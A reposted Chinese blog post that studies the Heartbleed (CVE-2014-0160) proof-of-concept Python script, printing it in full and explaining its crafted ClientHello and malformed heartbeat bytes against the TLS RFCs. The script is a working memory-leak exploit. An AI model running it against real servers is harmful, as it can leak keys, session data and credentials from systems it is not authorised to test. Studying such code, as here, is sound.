Openssl 漏洞POC学习
来源:互联网 发布:java web 线程 编辑:程序博客网 时间:2024/05/29 03:15
关于漏洞的细节以及相关危害可以参考知乎和乌云上的文章
OpenSSL 的 Heartbleed 漏洞的影响到底有多大?
关于OpenSSL“心脏出血”漏洞的分析
漏洞相关的代码就不分析了,上面的文章已经分析的很清楚了,下面主要分析一下网络上流传甚广的python POC文件。
#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)# The author disclaims copyright to this source code.import sysimport structimport socketimport timeimport selectimport refrom optparse import OptionParseroptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex')hello = h2bin('''16 03 02 00 dc 01 00 00 d8 03 02 5343 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cfbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 0000 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 8800 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1cc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0cc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 1100 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 0403 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 1900 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 0800 06 00 07 00 14 00 15 00 04 00 05 00 12 00 1300 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 0000 0f 00 01 01 ''')hb = h2bin(''' 18 03 02 00 0301 40 00''')def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) printdef recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, paydef hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return Falsedef main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s)if __name__ == '__main__': main()
上面比较重要和难以理解的是hello和hb两个字符串的意思到底是什么。
首先看hb这个字符串的几个字节是什么意思, 通过阅读RFC6520我们可以得到heartbeat的数据结构:
The Heartbeat protocol messages consist of their type and an arbitrary payload and padding.
enum {
heartbeat_request(1),
heartbeat_response(2),
(255)
} HeartbeatMessageType;
struct {
HeartbeatMessageType type;
uint16 payload_length;
opaque payload[HeartbeatMessage.payload_length];
opaque padding[padding_length];
} HeartbeatMessage;
这个数据结构的总长度不能超过2的14次方。
type: 消息类型, heartbeat_request 或者 heartbeat_response中的一个,不是0x01就是0x02,1byte。
payload_length: payload的长度, 2个bytes。
payload:内容是任意的东西,接收端收到之后必须忽略掉里面的具体内容,如果接收端响应这个request,那么需要将里面的内容原封不动拷贝回发送端。
padding: 也是一些随即的乱起八糟的内容,必须被接收端忽略掉。
padding_length: TLSPlaintext.length - payload_length - 3 for TLS 或者 DTLSPlaintext.length - payload_length - 3 for DTLS. 至少是16bytes.
在这个RFC6520中有下面一句话,IANA has assigned the heartbeat content type (24) from the "TLS ContentType Registry" as specified in [RFC5246]
意思就是说IANA这个组织把heartbeat content type的编号定为了24
我们去RFC5246中查找TLSPlaintext结构的定义。
RFC5246附录A中开头的定义如下:
struct {
uint8 major;
uint8 minor;
} ProtocolVersion;
ProtocolVersion version = { 3, 3 }; /* TLS v1.2*/
enum {
change_cipher_spec(20), alert(21), handshake(22),
application_data(23), (255)
} ContentType;
struct {
ContentType type;
ProtocolVersion version;
uint16 length;
opaque fragment[TLSPlaintext.length];
} TLSPlaintext;
type:1个byte,这里应该是heartbeat,24, 0x18
version:2个bytes
length:2个bytes
fragment: 具体的extension的message.
上面这一系列数据结构翻译成用c语言的数据结构就是:
struct {
ContentType type; //1byte
ProtocolVersion version; //2bytes
uint16 length; //2bytes
HeartbeatMessageType type; //1bytes
uint16 payload_length; //2bytes
char payload[payload_length];
char padding[padding_length];
}HeartBeatPlainText;
这样我们就可以对应的看出来hb到底是什么意思了:
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
18表示heartbeat type
03 02表示TLS的版本号,这里表示TLS v1.1
00 03表示heartbeatmessage的长度,也就是TLSplaintext的payload的长度
01表示heartbeat_request
40 00 表示payload length, 2**14
其中payload和padding都没有,这样正好就可以利用漏洞将后面内存中的数据dump出来了。
OK, 现在hb已经清楚了。
hello有225bytes, 具体的每个域的意思可以参考RFC 5246 7.4.1
https://tools.ietf.org/html/rfc5246#section-7.4.1
最好通过wireshark抓https的包来看client hello的解析。一目了然。
另外:通过在自己机器上测试发现XAMPP for Linux 1.8.3-3用的就是有漏洞的版本的openssl, 可以用这个脚本来进行测试,抓包。
- Openssl 漏洞POC学习
- Openssl 漏洞POC学习
- OpenSSL 漏洞利用程序脚本 POC
- 【漏洞分析】OpenSSL HeartBleed漏洞分析及POC代码
- OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
- 从fate0写的eyou漏洞poc学习Python
- Android重大漏洞POC
- struts2-045漏洞poc调试
- PHP 5.3.6缓冲区溢出漏洞POC
- 缓冲区溢出漏洞的poc代码ruby
- 【网络安全】Bash漏洞原理POC及ShellCode
- struts2 s2-045漏洞利用poc
- 漏洞应急响应之批量poc验证
- BlueBorne 蓝牙漏洞深入分析与PoC
- ISG pwnme100 poc 学习
- 【漏洞分析】Heartbleed 2014-0160漏洞Poc及规则分析
- 关于OpenSSL heartbleed漏洞
- openssl heartbleed高危漏洞
- TabHost风格与Holo theme
- Cracking the coding interview--Q19.3
- Difference between HashMap, LinkedHashMap and TreeMap in Java
- 服装行业ERP系统有哪些基本功能?
- 详解Google-ProtoBuf中结构化数据的编码
- Openssl 漏洞POC学习
- hdu 1170 Balloon Comes!(水题)
- 黑马程序员_网络编程
- Android美工坊--底部菜单栏实现
- 学习笔记(四):Application
- Linux下解压:tar、rar、7z命令简单易懂的教程(含实例)
- BigDecimal的介绍2(BigDecimal.setScale 处理java小数点 )
- 一款免费的FTP客户端、服务端工具FileZilla Server
- 清末民初张家口地区服饰习俗变迁探研